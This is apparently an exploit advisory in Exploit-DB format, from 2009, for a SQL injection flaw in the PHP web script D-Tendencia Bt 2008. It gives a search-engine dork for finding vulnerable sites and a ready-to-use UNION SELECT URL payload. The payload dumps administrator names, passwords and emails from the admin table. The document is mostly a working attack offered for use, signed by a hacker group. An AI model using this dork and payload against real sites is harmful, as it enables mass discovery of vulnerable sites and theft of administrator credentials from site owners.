D-Tendencia Bt 2008 - SQL Injection

Author: Dr.0rYX & Cr3W-DZ
type: webapps
platform: php
port: 
date_added: 2009-12-15 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

                                                    ALGERIAN HACKER
  **********************- NORTH-AFRICA SECURITY TEAM -***********************

[!]            D-Tendencia Bt 2008 SQL Injection Vulnerability
[!] Author    : Dr.0rYX and Cr3w-DZ
[!] MAIL      : vx3@hotmail.de  &  Cr3w@hotmail.de

***************************************************************************/

[ Software Information ]

[+] Vendor : http://www.autoabc.hu/
[+] script   : D-Tendencia Bt 2008
[+] Download : http://www.autoabc.hu/ (sell script)
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"list.php?lcat_id="

**************************************************************************/
[ Vulnerable File ]

http://server/list.php?lcat_id=[N.A.S.T ]

[ Exploit ]

http://server/list.php?lcat_id=-1+union+select+concat(admin_name,0x3a,admin_pass,0x3a,admin_mail)+from+admin

[  GReets ]

[+] :claw , le0n ,his0k4 , WWW.exploit-db.com , ALL HACKERS MUSLIMS